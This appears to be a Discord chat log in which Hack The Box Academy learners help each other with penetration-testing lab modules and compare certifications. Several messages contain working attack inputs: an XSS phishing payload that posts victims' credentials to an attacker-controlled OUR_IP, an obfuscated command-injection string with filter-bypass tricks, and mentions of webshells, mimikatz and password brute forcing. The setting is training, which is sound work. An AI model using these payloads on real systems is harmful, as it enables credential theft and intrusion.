#modules
Hello Everyone,
just used linpeas, showing it is a container, and on /proc mounted looks like exploitable, does someone know what this is? didn't see this on academy
ATTACKING COMMON APPLICATIONS
Application Discovery & Enumeration
When i run aquatone, this is the output page, any ideas on what i did wrong?
there are filters you need to bypass
I tested with your command line and I'm still getting errors, this is very weird.
What's the intended way? Brute force login on SMTP? It seems very fragile and will fail if I run more than 1 connection at a time.
there are other services running
Yeah, I've been successful with using ${IFS} instead of spaces, ${PATH:0:1} instead of forward slashes, separating letters with single quotes, using %0a instead of an ampersand. But I still can't read the flag. If I try to use a space or a backslash, I get an explicit error message, but I've been able to get rid of all the explicit error messages. I just don't get any output when I try to read the flag.
solved, use chromium or chrome not firefox...
are you able to run id?
yes
then just continue with that and cat the file, don't think there's much more than that
ok so I troubleshot it some more and it seems it was the number of simultaneous connections that was the issue, just in case you are interested. Running with -t 1 fixed it
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts without more context is hard to say, but pretty sure it's not academy related, might want to ask at #boxes
thanks sir
I just reset the target and the same command I had been using before with no success worked right away.
in common services attack skill assessments, are the user.list and pws.list still valid? I just ran hydra against ftp, smtp, rdp and https basic auth with the name ||fiona|| and got no matching password.
if the lists attached to a module don't work and there's nothing on the box hinting at a password or list you can make, then use rockyou.txt
good old rockyou, with 1 connection at a time I'll see you guys tomorrow! thanks for the tip
you're getting the same error even for ftp and smtp, etc.?
That's fixed, the issue was too many connections at once
Hydra is working just fine now, but I didn't get any hits with the module's password list
I'm not so sure, I use -t 32, -t 48, -t 64 all the time
It depends
Everything seems to point to a brute force attack though
ssh demands -t 4, but there's nothing in that module that requires -t 1
I forget what I did for this one
I do too usually, but on this box it seems to not work.
Tbh I just looked around
ftp works
smtp works too
you don't even need the provided list for that
Isn't this the ||anon|| one?
I think we're still talking about the one with fiona, apologies if I'm wrong
yeah I found fiona, it's the easy box
that's what I thought
oh I just ran rockyou and got a hit
there you go
The errors plus attached password list threw me on a wild goose chase
thanks for the help lol, it was something very simple in the end.
strange
Hello ninjas,
anyone worked with xfreerdp?
probably anyone here who didn't start yesterday, what's your question?
nope never heard of it before today
definitely don't know about the goated /drive: option
or /dynamic-resolution
what’s that
i did the smart thing yesterday and zipped up the Windows tools and transferred them to my vm
big brain thinking, I've also done the same
when i initially started the zip my rdp connection dropped
but it was still going after i reconnected so
👍
It is a remote desktop protocol lib
I get a Certificate verification failure 'self-signed certificate (18)' error
try the option /cert:ignore
there's an option to ignore certificates, check the manual
Wnted already said what it is
oh I thought It should use certs, ok I'll check that
nah
htb machines you're safe to do /cert:ignore
and even then you CAN just have it connect and accept the cert each time
¯\_(ツ)_/¯
So I got the flag in Common Service Attack easy skill assessment by checking the file structure in the files on the FTP, dropping a webshell from mysql, accessing through the browser and got a revshell. But ... I feel like that was a bit much for an "easy" box. Did I miss something trivial?
sometimes the difficulty rating is misleading
HTB difficulty in general is different than other platforms
Thanks @fathom pendant
hmmm, actually I have trust issues in anything on the internet 😄 LOL
That's healthy 😄
There's no mention of webshells so far in the module so I am sure it was a bit overkill
yes; but these are academy modules that you're connecting to with express permission
technically there is
don't we all?
Oh I am not crazy then 😄
but at the same time: iirc that one has a couple different ways to get it
If you are a security analyst and not paranoid, you aren't in the right field I am afraid.
I did find the easy skills assessment there to be the most convoluted
Most of the time on HTB, if you're ever connecting to a service that involves certificates, you'll need to ignore certificate validation as they are self-signed, not signed against a common CA, so yeah.. on HTB it's fine. Public internet, stay vigilant
I wouldn't trust difficulty ratings too much, I've found some medium modules easier than some easy ones, it happens
Appreciate that advice 🙏 I will
For something easy I expected something like smtp enum, brute force the password and RDP.
I would say that's because you're coming fresh off learning it: so it's pushing you in the direction
and you're having to remember something you may have learned a few hours or days ago
it wasn't hard per se, just a lot of steps, but that's all fine
If I hadn't done OSCP before this I don't think I would have got that one. I don't think the module mentions webshells.
the module mentions a method of getting a shell
There's a whole Shells & Payloads module before that one
via mysql iirc
it's just making me wonder if I didn't skip over something super easy
it's a whole thing
are you doing them out of order?
^
because anything from previous modules is fair game
I am since I did the OSCP before. I'm checking what's missing from my knowledge base to get the OSCP certification.
don't
because the htb modules are gonna be more in-depth than what OSCP is gonna teach
But I'll most likely revisit all of them later
a LOT of the information is built off each other
or do, but you'll run into a bunch of situations like that where the module didn't teach you something, but it was already taught in a previous one
^
while yes the modules are generally self contained
they are assuming other knowledge
this isn't OffSec's "figure it out yourself, loser" approach
yes but my time is limited before my exam and I know where I am lacking. Plus it's to succeed in the OSCP, not the CPTS. I will come back to them at one point.
Lol you tell me. so far HtB is much more interesting. I wouldn't recommend OSCP to anyone over HTB
Yup, pen-200 is a shit course, but we been knew
Is Offsec structure still "here's a doc to read", and then pass you to the labs to practice?
Been a while since I did it
that's a point-of-fact made clear by people who hold both certs
and maybe some AI voice generated vids from what i heard
No, they've copied other platforms and have the modules and exercises online now
the labs are hit/miss or just completely back-asswards
Not anymore. but its still bad.
Interesting, thanks
Yeah, thing is, I failed my first attempt with some bullshit box, even my veteran coworkers couldn't figure out it post engagement and anyone I know who got it, failed. I am checking the stuff I know I am lacking from the OSCP first, but I am coming back for all of it, don't worry!
It's an improvement, but it's still crap compared to what else there is on the market, and extra crap compared to CPTS
There's 3 standalone boxes though, couldn't find out the other 2 either?
I don't believe in shitting on competitors, think we're all doing good in the field. Doesn't stop me from hearing others perspectives 😉
I had spent so much time on the big AD by that point I was out of steam.
and like we said: while it's good to brush up on things you don't know -- this path is definitely best done in-order
I only shit on OffSec because it's deserved, there are good vendors outside HTB too, and I recommend those based on context
not pick and choose :P because methods taught earlier (that might be better than offsec's methods) might be MORE beneficial than just strengthening your weak points
I'm waiting for reaction from offsec dev team and then I'll be starting my oscp journey as well
yeah, I am just trying to up my weak points in order to get more general knowledge in my limited time. Otherwise I would. Will check all of them don't worry, so far it's much more interesting.
Some of their newest sets are shit that isn't covered in their course at all
There’s an issue with the link I got sent to accept the course
And they're adding more
Personally I’m going through the ad, sqli and privesc modules
I think those will matter the most
I completed all exercises successfully and got nadda in the end, so yeah. It's a lot of figure it out yourself.
Yeah, I agree
I've done PNPT, most of CPTS and their stupid course in a couple of weeks, still failed the first attempt
Cpts and their stupid course😄
got deleted before I could
Good
probably deleted for a good reason
Sorry, I meant pen-200 as the stupid course 😁
as in a "careful what you say about a closed exam"
I know of that.
if you see X on the exam RUN ;)
I know 😄
With all the extra stuff I did post exam i still don't know what I would do more if I ever got the same box.
Same 🤷
you got it before too?
The ad set was unbeatable?
That would give some big issues
40 points down the drain
Yup, I've researched it for weeks and weeks, nothing
essentially. Even veteran pen testers didn't figure out how to approach it.
Yeah, I know plenty of pentesters haven't been able to do shit on that indeed
All we can do is pray we get a different one next time
yeah, makes you wonder if it's so you buy more attempts 🤔
Getting scared now 😄
It's the newest set and most people are now getting that one
plus I despise how they spy on you through your webcam for 24h, not doing that again once I get that cert. Very unpleasant.
So even cpts module won’t be enough?
I got crte material as well
As long as you don't get that one AD you should be fine... I think?
I really don't mind the proctoring, but I'm not getting anything else from OffSec
Or I need to root all the standalones
I rooted two, got user on the 3rd
if you have done 80% of the exercises
Definitely get those, yeah
If I get the same box I just focus 100% on the standalones and I think I'll be fine.
If you got the bonus points you can ignore the AD, but I was so focused on getting it that I was too tired by the end to root 3 boxes
You’ll get it next time
hey don't jinx it!
Pay harder
😆
the HtB courses sure are making me more confident though. Just not against that AD
It haunts me in my nightmares, I hope one day we find out what that was about
I am not into satanic rituals sadly. Have you seen the horned jenkins on the oops pages? I see it in my nightmares too!
if you didn't buy any cubes or have an active subscription the pwnbox is extremely limited in its internet access
yes: nothing is stopping you from downloading and setting up your own vm though
hey guys whats up
Hey wsg y'all.
Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.
Password Attacks - Linux PTT
I know the answer, I found it without the actual need to SSH as I could just cd into svc's dir.
The problem is the following:
I found john's keytab, hash and password, any idea where I can search for svc's credentials?
Checked the crontab -l, found a script, ran it, nothing happened.
maybe check where the script points to
there's ways to extract info from a keytab and ccache :P
Hey everyone
A quick stupid question :D, if I cannot ping academy running machines, are there any quick troubleshooting steps I should count on?
- I am connected through HTB openvpn via udp: 1337 => "Initialization Sequence Completed" - pinging google works
- pinging machine =>
```
$ ping 10.129.33.67 -c 1
PING 10.129.33.67 (10.129.33.67) 56(84) bytes of data.
--- 10.129.33.67 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms
```
True, haven't checked ccache.
end the connection, rm the file, download a new one
change to tcp; and changing server region also helps
noted Thanks ♥
@fathom pendant can u please remind me what should I do ? I kinda forgot
the thing
idk man i'm not you so idk what you need or want
Nothing too special
there's instructions at the bottom of #welcome
on how to access more of the server
I just wanna know the next step
jesus christ
I'll try
don't try, do
chill marc
@fathom pendant can we chat on private real quick?
you need an account on http://app.hackthebox.com/ to be able to verify
no
Now I have to get to another sever ?
i never said to go to another server
the instructions are there under the verification section
pretty quick and easy steps
#bot-commands these ?
Yeah, I saw the .kt thingy, I even checked it before...I doubt however that this is Kotlin related, which .kt is about.
that extension is also used for keytabs
I swear I tried to send a pic
Anyway thanks
You don't need to send a pic, you type the command with your account identifier
can't send a pic here unless you verified/linked your account
Oh well...that explains it. Going back to work, thx for the fast response :)
i believe the section explains how to extract info from those files
Yeah, I transferred a .py keytabextract.
i thought that was already on the system
might not be though ¯\_(ツ)_/¯
sometimes it's 50/50 on the provided hosts
We shall see.
@fathom pendant I tried to put my information but nothing worked
My email and my password
Did you even create an account, fam?
I literally wrote them on a paper just in case I forgot
Yes yesterday
academy and app are different platforms
Oh, well it probably didn't activate as it might've expected verification on email?
And that^
if you signed up for academy the login is separate from app
So what should I do ?
hence why i said WAY earlier that it requires https://app.hackthebox.com account
create an account there
and use the identifier of that account
academy doesn't have an identifier for the account (yet)
Exactly 🙂
at least you're self-aware
Hm.
Laters
on https://academy.hackthebox.com/settings if you scroll to the bottom of that page, there's a delete account button
¯\_(ツ)_/¯
ok alligators
Should be a delete option right in the settings, but I don't see why creating two accounts in 5 minutes tops is a problem
not gonna force you to participate in something if you need to have your hand held at every step
Let's move discussion back to modules, don't need to think about them anymore.
The modules, yes, they're great, love them
Very..modualistic
you getting this figured out?
Yup, got the password already.
sweet! also there's another enumeration tool they use: i highly suggest it - very helpful for the last question
So modular indeed, and those sections
But I don't think svc's home should be accessible (without svc's password,
don't think too hard about it
Once I approach it , I will be sure to regard my matter to you.
svc is a service account it needs to be accessible by other users, in-general
service accounts are definitely unique
maybe but would you have actually learned anything? ¯\_(ツ)_/¯
True.
aside from "swing hammer until it works"
I receive the following error when attempting to start a target in Password Attacks > Pass the Ticket (PtT) from Linux: "You don't have enough permissions to create a genesis."
EDIT: Fixed by launching another target in another module and then relaunching the original.
gagbit it
Hi @fathom pendant, can you help with the selection of the right module to develop new skills for a CISSP cert
Why ask a specific person without even knowing if they have that cert?
Someone in #careers-and-certs might be able to advise on that
wow, finished the Hashcat module, didn't know that Hashcat has so much more to offer than dictionary attacks
fun fact: hashcat has an output mode 👀
what do you mean with that?
File Upload
The above exercise uses a blacklist and a whitelist test to block unwanted extensions and only allow image extensions. Try to bypass both to load a PHP script and run code to read the "/flag.txt" file. I am stuck on this question. I find a few working payloads from burpsuit but after pasting them in the url I keep getting 404 found error.
just that hashcat has an output mode xD so you can output to a file instead of forgetting and needing to run with --show
HELP ME
ah got it, just like in nmap
yep lmao, know how much headache that saves?
ya especially when using tmux and can't scroll up so the output is capped xD
i played around with it a bit last night
-o file.cracked --output-format=2 gives you just the plaintext password (not the username associated with it)
good when cracking big lists
File Upload HELP ME !
The above exercise uses a blacklist and a whitelist test to block unwanted extensions and only allow image extensions. Try to bypass both to load a PHP script and run code to read the "/flag.txt" file. I am stuck on this question. I find a few working payloads from burpsuit but after pasting them in the url I keep getting 404 found error.
you don't have to repeat yourself
go through the section again and use the same payloads
The time has come...
Even if it's 3:16 AM.
we honestly do not care
Wsg Anders.
the gen chat is elsewhere
hello anders_hack-tech
hey @slender shoal peep @ their profile
I already think You have some RandomServiceOfferRadar.py
Running on MarcieLee@root
i'm just experienced in spotting this shit from a mile away; even without the profile it smelled fishy
you have big antennas MarcieLee 😄
Got that name of the tool, before I die on my desk asleep
look towards the bottom of that section if you haven't already lol
linikatz*
btw which module can you guys suggest, which one did you enjoy most? can't decide which to do next
like mimikatz: but linux
Password Attacks.
:))))
i'm doing the pentester job role path tbh
it helps reinforce fundamentals too
How far r u into it?
only halfway - got distracted by some bullshit life stuff
:P gotta finish up ad enum soonish
but christmas and stuff
Yeah...relatable.
that's best to check out after cbbh
yes: CWEE
Weeee
the acronym has been known since they dropped Gold Annual
Mm.
on Pentester Job Role im only 34% rn
Has anyone had the urge to reread everything twice or thrice.
Even after a module is completed.
Same, just at the end of password attacks.
do them in order
if you're doing the pentester path, it should be in order
im doing no path tbh
there are concepts in the path that you're expected to know from other modules (or if you already know them)
you're just stating in general that if you were doing it, you'd be 34%?
picking modules at random?
yes its a hobby rn
trying to get an apprenticeship, after that i want to become a pentester
bug bounty hunter is 66%
tbh if you want to become a pentester, do the path itself in order
don't just do random
just finish the modules there in order
might be wise to do so
:P you might learn a bit more than you think you know
i enjoyed the most in the NoSQL module btw
@lusty thicket @fathom pendant Thanks for no help other than empty talk.
I mean Wnted definitely gave a valid tip 🤷
you're not owed any specific help :P and I've seen Wnted be more right than most in that reading the section you might find that one of the examples works
you're needing to bypass an image filter to run php code is what they give you so you need to do something like x.php.png or something along those lines
¯\_(ツ)_/¯
but the section should be more specific about it
@fathom pendant If you read what I asked you would understand that I passed the filter but I can't access the website. You're not reading properly. But you advise me to read it again?
Be nice.
heated
I'm shutting up. I'm very angry tonight. I'm sorry if I offended you. I've been in the same place for 7 hours.
or you're accessing the resource incorrectly
then step away, take a break and come back with fresh eyes and brain tomorrow
I have been on one section for an entire week.
Just imagine how good it will be when you figure it out 🙂
Not once did I get mad.
Maybe, that's because my aggression pours out at muay thai sparring.
Damn, that's a loophole -> be stuck on a module for a week -> beat people up in sparring + try harder.
the thing about this chat is it's community driven, when you come in ENTITLED to have your question answered then you're likely gonna be disappointed when the answer was staring you in the face of your impatience ¯\_(ツ)_/¯
Well, I always search the question if it has been regarded before.
And every single one is
that also helps :P you're likely not the first person to come here with that issue
Yup.
and sometimes it's just you flipped a and b order around
we should rename this chat to support, now we are slaves, we need to help 😄
like forgetting to start a listener before accessing your shell
Oh that's a pain in the ahh.
or in the live engagement for shells and payload: forgetting to use the internal IP address
point is: everyone dum
type flag.txt on Linux after you've been at it all day
Hhahahaha
nah dude, kid's an actual prodigy
I hope I don't go to jail, beforehand
Bakki? Nah, no one's surpassing him
Aight bet
not even 18 and doing maldev R&D for work; and making his own C2
What the f
Yeah, people ain't joking when they say prodigy
Y'all weren't joking about the kid part
@mossy solstice how old is u
17
I think he caps
💗
lmfao why would i lie
U r secretly nsa
i wish
Makes me feel too old for this
bakki just has an insane drive for knowledge
he does not care for certs 
I solved the room before I died. I'm going to bed. I apologize for my bad words, good night.
What a chad
You don't need no certs, when you've got pure genius
i mean why would he if he's already got a job in the field
imma be real ur never really too old for this unless you have dementia or alzheimers or smth like that
ye bakki is in a country where he can have a jerb at 17
or severe brain damage
i mean making ur own c2 not necessarily impressive its moreso the stuff i wanna add to it that i guess makes it based
Damn
🪞
i wouldn't compare yourself to bakki tbh ¯\_(ツ)_/¯
comparison thief of joy remember
he's an example that if you have clear skill: then certs are just fancy toilet paper
like school degrees
Yeah, it's not gonna stop me, but it might have been better if I'd figured this out a decade ago 
@hallow kiln i root for you ull make big moves
imma be real
even me wishes i started younger its a bias you'll never get away from no matter how young
3 months
if i had not actually stopped learning 10 years ago i'd probably be at a decent level now ¯\_(ツ)_/¯
I am slow af
skillset that got me my job was a year ago but i actually started htb maybe 2 years ago
Beginning of this year, I'd tried a couple of years ago, but life got in the way, so had to begin from scratch
maybe more, used to do web and stuff
I got stuck in the trap of wanting someone to mentor me
and not wanting to learn the info for myself
i did game dev before, wish i've started earlier with htb
I've always liked learning things for myself, never thought about mentoring, it includes talking to people and shit
i wanted to do game dev too but it got boring 
also hearing stories about how it goes in companies its uhhhh yeah, passion is cool mental health is cooler
Yeah, I've got friends in the gaming industry, it's a mess
crunch time go brrr
yeah part time tho
(because AAA is too much of a bitch to actually admit they overpromised)
take it full time after you grad/turn 18?
I imagine you'll never run out of opportunities with your skills
i seen people that in comparison i look like a noob too almost be homeless, u never know sometimes luck does not go brrr
but yeah its just specializing that does wonders
All the best to you, you've got the skills and the drive to get places
yeah just saying like sometimes u just get unlucky doesnt mean you shouldnt try
there is always bigger fish
there is no objective best either ways
never
i was already asked if i wanted osep but truth is i cbf with taking the exam
i did cybernetics which is apparently osep like and it was fun but ehhhhhhh
i would maybe consider cpts if the course wasnt mandatory
just cuz i have a lot of friends doing it and im wondering how painful it would be
Hi everyone! Has anyone done the ADCS module? I'm stuck on the last question of the skills assessment. Getting an odd certipy error so I'm not quite sure what is going wrong even with the -debug flag. Any help would be greatly appreciated 🙂
They really should get rid of the mandatory course completion thing
yeah only to relate to the pain of some people
i didnt really hack in so long i know i would probably get slapped
by flag 9
I will find out what that's about soon™️
Hi does anyone know how to get the answer for the first question (What is the URL of the WordPress instance?) in Attacking Common Applications - Skills Assessment II? I've tried fuzzing and keep getting 302 errors and can't find it, I'm using this command and others alike: ffuf -w /usr/share/SecLists/Discovery/Web-Content/CMS/wordpress.fuzz.txt -u http://gitlab.inlanefreight.local:8180/FUZZ
got it working! hehe it helps to play around with the flags 🙂
Awesome module! I love academy 🙂
would love to see some cloud stuff 😄
or windows binary exploitation other than vanilla buffer overflows 🙂
Socks5 Tunneling with Chisel Module:
Anyone find a workaround for this?
Posted in erratum already, but I'm wondering what kind of workaround there is. I searched the post history and it seems as though a lot of users have had the same issue.
just use a different pivot/tunnel method
might not be the official method
but it's what I did
What method for this one?
I'm trying to work through the module as I read it.
I can go back to another one if that's necessary.
on password attacks skills assessment - Hard how do i transfer B******.v** to my machine
i tried smb and nfs but they fail always
Will Sshuttle work?
most other methods work
if doing xfreerdp you can mount a drive by doing /drive:name,/path/ *you can also do relative paths like ./ tells it to mount the current dir you're in
O.O thanks i will give it a try
What does the word "give" mean in your sentence?
You're gonna need to disable CGO and recompile the binary on your host, or compile the binary on your target; that's obviously an incompatible C lib dependency issue. CGO by default is enabled and allows you to invoke C code from Go code, try to use export CGO_ENABLED=0 when compiling the binary again. Read more on that. Sometimes solving a problem brings clarity on a whole other subject.
I don't recall personally having that issue, maybe because I compiled it months before I used it on that box and my C lib was in sync with the version on the target.
compile it statically
Hey can anyone help me with pivoting assessment?
in password attacks - hard, how to mount the B*****.v** file
You can search this channel. Plenty of articles
Accessing content from Windows BitLocker encrypted partition in a vhd file on Linux
This is one of the easiest to follow
my windows doesn't have bitlocker either :(
What errors do you get in wsl?
Your windows doesn't have to have bitlocker my guy
then how can i mount
Google: mount vhd windows
oooo it works
On windows? I believe it’s as simple as right clicking and mount
But also this is another L for wsl
I've had it work pretty well in a regular linux vm
HAHAHAHAJ are u for real?
i had to click from the drive instead, i was clicking the vhd file
I got the answer to these 2 questions through brute forcing it (well, more that I made a dictionary attack) lol... for the first one, I essentially tried all powersploit commands... for the second I got all exe and went trying... I have the right answer but need help understanding. (the first one for instance I have no clue how to arrive at the answer properly, the second one I sort of do but I don't understand why that's the answer). If anyone has any insights I would appreciate it.
2. Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at https://github.com/PowerShellMafia/PowerSploit) has been utilized within the process, and enter its name as your answer.
1. Investigate the USN Journal located at "C:\Users\johndoe\Desktop\kapefiles\ntfs%5C%5C.%5CC%3A$Extend$UsnJrnl%3A$J" to determine how "advanced_ip_scanner.exe" was introduced to the compromised system. Enter the name of the associated process as your answer. Answer format: _.exe
How do I find the index number of a file??
am confusion
I tried ls -la
but none of the numbers seem to work
is there a way to get an iso of the version of the HTB version of parrot OS used on the site that brings all the wordlists and stuff?
OK I feel really stupid or I miss something...
in AD Enumeration & Attacks - Skills Assessment Part II - question 1:
I tried all the methods to find users, but only kerbrute worked.. found 57 users
tried all the passwords in the modules about password spraying but nothing worked.
How am I suppose to guess the password?
I honestly don't even remember any reference to index numbers for files in the module, so I'm not exactly sure where it's wanting me to look
nvm
forgot about -i
using the tool shown in the module responder
Hello! I ran into a problem in the CROSS-SITE SCRIPTING (XSS) module - phishing. When trying to delete an image url input element using the
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();<!--
As a result, a fake authorization form appears on the site, but the image url input field does not disappear and a piece of code sticks out
');');document.getElementById('urlform').remove();
Nothing is working. Can someone tell me what I'm doing wrong? Thanks!
Try with this:
```
;document.getElementById('urlform').remove()</script><!--
```
Probably you aren't closing the rest of the HTML code
Hey hackers, I'm in nibbles priv escalation.. I uploaded a reverse shell.. got my bash shell.. now I wanna be root so I ran LinEnum to find that monitor can be run without root password. Now, when I execute sudo bash monitor.sh, it asks for sudo password. But why?
don't use the enumerator scripts, getting the solution is a lot simpler
@surreal nymph there's a command that will tell you what programs you can run as sudo, use that to check for what you can run via gtfobins
@rustic sage Thank you for your response. I'll check it out ! 👍
monitor.sh is the right way to go though. your command is trying to run bash as sudo, try running the script directly
ah wait it's not gtfobins it's payloadallthethings sorry
OK got it.. thanks. Had to use verbose mode in Responder
eee this exercise is tunneling my brain
yep i did it again i forgot to run rdp as admin
awesome!
sudo ./.sh
hi who can talk with me about learning english for hacking
show the sudo -l result
You got me!
okay i am 14 years old and my english is not good. I want to learn cyber security and i don't wanna pay money to learn english, what should i do
.
English is a very easy language to learn, so don't worry, learning it would be a breeze for you.
You just have to include English in your daily routine conversations (verbal is effective).
You can watch english movies or content with subtitles on.
You can read write ups or novel stories to capture the flow.
You can write something about your day every night in 200-300 words.
As simple as that.
I just wrote this all randomly, so don't mind the writing errors.
ahhhh
I did but I can't see the effect
It is a constant or consistent journey, things take a bit of time to establish. Just keep going..
You can translate the Academy modules into your native language with DeepL. This way you learn both English and hacking
However, I am not a native English speaker, I am still learning to communicate with corporates
but this way can work for me, just beginning
Are you from Russia?
nope
Hi all! Can anyone help with the skill assessment for HTTP ATTACKS. I bypassed WAF, it turned out to be not difficult, I have several ways to smuggle a request, but I do not receive a response letter, which I redirect to myself. I tried all possible options, but unfortunately nothing gives me any information that I could cling to, since the response letter does not arrive.
Sometimes, we transform a simple issue into an escalated problem. It happens to me, a lot!
anyone can use it
Module: Attacking Enterprise Network
Section: Exploitation and Privilege Escalation
I'm stuck just on trying to browse to the target website ||(172.16.8.20)||. I have ||used SSH port forwarding for port 8081 and modified /etc/proxychains.conf, and I have also updated my proxy settings in firefox||. Back in my ||root@dmz01|| shell (which I spawned through ||dynamic port forwarding||), I see a bunch of messages saying "Temporary failure in name resolution." I'm not sure how to fix that.
From a general standpoint sounds like incorrect DNS settings, but you're trying to get to something by IP so maybe it's an unrelated error message.
I'm pretty sure it's related, because the error messages pop up in the shell soon after I try to browse to the IP
Are you trying to SSH to the IP or open it up in a web browser, I'm on the SOC path so not familiar with the module you reference.
I have a feeling it's something pretty simple like a typo or something or firefox trying to do a google search for the IP and it can't resolve google.com
if you're browsing to an IP it shouldn't use DNS at all
Sorry for the confusion - I've ||SSHed as root into a box on the perimeter of the target network, and I'm trying to use it as a pivot host to attack boxes on the internal network||. One of the internal IP addresses is ||172.16.8.20, which has port 80 open||. Given that I've set up ||a pivot as root on dmz01 (on the network perimeter)||, I should be able to browse to the site.
Yeah good point lol
I'm going to try ||setting up the pivot using a tool other than proxychains (Metasploit, Ligolo)|| and see if that is more stable.
Can you ping the IP from the box in the DMZ? Best to check lower levels of the OSI model first before trying something like port 80, and an internal host would probably not accept connections from hosts in the DMZ.
bear in mind that most people want to do Attacking Enterprise Blind
so you're already revealing quite a bit about the network: Can you please use spoiler tags || before and after
||like this||
that at least lets people who are interested in helping you to help without fully spoiling anything for people who still want it blind
(like myself)
Yes, great point. Thank you. I'll delete my previous messages.
you don't need to delete, you can just ||edit them in||
lol it's not twitter; edit features exist
What's Twatter? Only familiar with X and TikTok because I was born this year with an iPad in my swaddle.
I'm going to take a break for now and come back to this tomorrow. Thanks to those who offered help!
the only appropriate app to deadname is twitter
and idk if you're being serious
Edited to remove ambiguity.
So working on the command injection module, and one of the side exercises is to see about getting a command escaped. Here is it in the module:
$(a="WhOaMi";printf %s "${a,,}")
Here is my version with items spaced out so its more apparent what I escaped and didn't
$ ( a = " whoami " ; printf % s " ${a,,} " )
$%28a%3d%22wh'oa'mi%22%3bp'ri'ntf%09%25s%09%22${a,,}%22%29
Any help would be appreciated. This is a Linux box I'm testing against.
hi everyone, I am unable to pass the current section because "Target: Click here to spawn the target system!" doesn't show the target IP, hence I am not sure how I can find the right IP on which I should complete the section and answer the question, any suggestion?
you have to spawn it
what do u mean
I do click it but it doesn't show anything
Does it do "Target is spawning"
module/35/section/247 web requests GET
I am not sure , but I was able to do that before
HTTP fundamentals
or clearing cache and relogging in to try again
also disable any ad blockers
for me its spawning
I don't see a module named "HTTP Fundamentals"
fwiw Module name means the name that's in the tab/title of the page; section refers to the small part that you're working on
I.E. "Web Requests; HTTP Fundamentals"
Module Name is Web Requests
I did clear the cache, relogged, but still, when I click on it, it says Target is spawning, then it shows again the "Target: click here to spawn the target system"
As Rafa said its working for them
and not showing the IP or the website that I should be practicing on
Need to speak to a person? Learn how to reach our support via HTB Labs.
I was able to launch all the servers there
Did you try changing vpn region?
That might not fix it
But eh worth a shot
(Reason it might not is because these web servers are public ips)
okay
so I disabled all the VPNs, but still it didn't work
however, going into the developer tools, looking at the request, I found the response with the ip and port number, now it does work. However, the HTB website itself doesn't show this response, for some reason, no idea why
seems like so
these kind of bugs are quite annoying 😉 but thanks guys for your support
pivoting and tunneling skills assessment - i got hashes for the user, but i cant crack them
tried rockyou with deadone
If you can raise it with support, please include OS, Browser and version, and any plugins enabled. Thank you 
Just finished the Web Attacks skill assessment and my days, definitely one of the most thrilling, even tho I spent like 4hrs on it 💀
probably not meant to be cracked, if it's ntlm you can pth
will do bro, I hope they will fix it
If you have that info now I can include it internally
but that is not in this module
Don't recall any hashes for that assessment, I think you could find passwords there 🤔
If you want to drop that info in DM I can include it in the message I raised internally about this - see the same issue a couple of times recently (including you) from people
find passwords or extract from lsass
okay, let me DM you with the info
Thanks!
because the hint says this
lsass doesn't have to only contain hashes
Mimikatz is your friend, look at the most common commands you can run
iirc i remember facepalming SUPER hard
like it was that simple
oh i got it now, before i used mimikatz wrong
I am doing the medium Footprinting lab right now and found some database user credentials, but I don't see any open SQL databases. I guess it may be an internally hosted database only but I don't seem to have the creds to login via winrm to check for that and login to the db. Am I missing something?
Then you better footprint some login details :)
lmao I will keep looking
also iirc that one (once RDP in) you need to do some digging around to find creds for SQL
Bump? #modules message
Casing is important sometimes.
still working or just hanging out? 
Just hanging, but like to help if I can
ah I see, happy holidays 🎉
You too 
Hey, I'm having some problems in the module Windows Event Logs & Finding Evil in the section Analyzing Evil With Sysmon & Event Logs. I don't really understand how to do the DLL injection; if someone can DM me it would be easier 🙂
The question is Replicate the DLL hijacking attack described in this section and provide the SHA256 hash of the malicious WININET.dll as your answer. "C:\Tools\Sysmon" and "C:\Tools\Reflective DLLInjection" on the spawned target contain everything you need.
Especially in a linux context
||I did this command in cmd: calc.exe 7 C:\WININET.dll. The calculator opens but it doesn't seem like it's injecting the DLL since I don't get the hello world, and the hash I'm entering is wrong||
Life or Death?
Is it a module related issue?
Have you tried to HTB Academy forums?
How about google
or heck even chatGPT
Nah bruh
Wrong neighborhood, sry.
Hey guys, I'm currently on Password Attacks Lab - Hard and I've found a Logins.kdbx file and I've cracked it and got the password Qwert*** but it doesn't work for the user david. What am I doing wrong?
Hehe, KDBX, what program you know of uses those password DB files?
I used keepass2john to turn it into a hash
someone please kick this person
You can contact the police. We cannot help you.
did you open the vault
I only know KDBX because we used to use it at work, but it got replaced with a commercial solution.
Wdym? I've tried to SMB into david's share but it shows the password is wrong
So a vault typically contains?
a software vault
maybe the pw you are using is for the vault and not the user acc
that should give you enough info.
HTB blows my mind with how well their modules apply to the real world.
what is a vault? wdym
won't give you any more, you have the file type already just use google
and what xre0us said
you should look up what's a kdbx file
its a keepass file right?
maybe
Yeah exactly, I've got the hash using keepass2john and I cracked the hash but it doesn't work
doesn't work on the share?
nope
it's not supposed to
I've checked an online walkthrough and that's what they do, it just doesn't work for me because I'm stuck
again, did you open the vault?
Is this part of the pen test path?
Ez cubes.
is the vault lsass hklm sam or whatever?
negative good sir
Is that a yes or no
negative = no
not really, affirmative = yes
Please someone give me a hint atleast
google what a kdbx file is and what it can contain
ok
Yea take above advice it's easy
i feel stupid asf
You're really overlooking the obvious dude
Someone the other day legit did the same thing
Yeah alr i got it now it was a stupid mistake
Best steps when you start getting frustrated is to step back and re-evaluate
yup
another thing I would suggest is when you try to harvest hashes from something and crack it, understand what that thing is first
Tbh your first mistake was following a guide
For the skills assessments if you need to follow a guide you already failed yourself
I haven't really run into a skill assessment that's tactics weren't covered by the material
Guides for tier0 content are permitted to be posted
I've considered doing guides for them as a side thing
¯\_(ツ)_/¯
I mean if you find it just report it to htb, and they can take actions :p
the goals of the modules aren't to complete them as fast as possible. It's to actually learn the material ¯_(ツ)_/¯
Getting nudged in the right direction or affirming that you're on the right path isn't bad
You wanna check boxes, buy some graph paper and a pencil. You wanna learn? Work through it and grow
I had some brain dead moments when I just jumped straight back into ad enum module
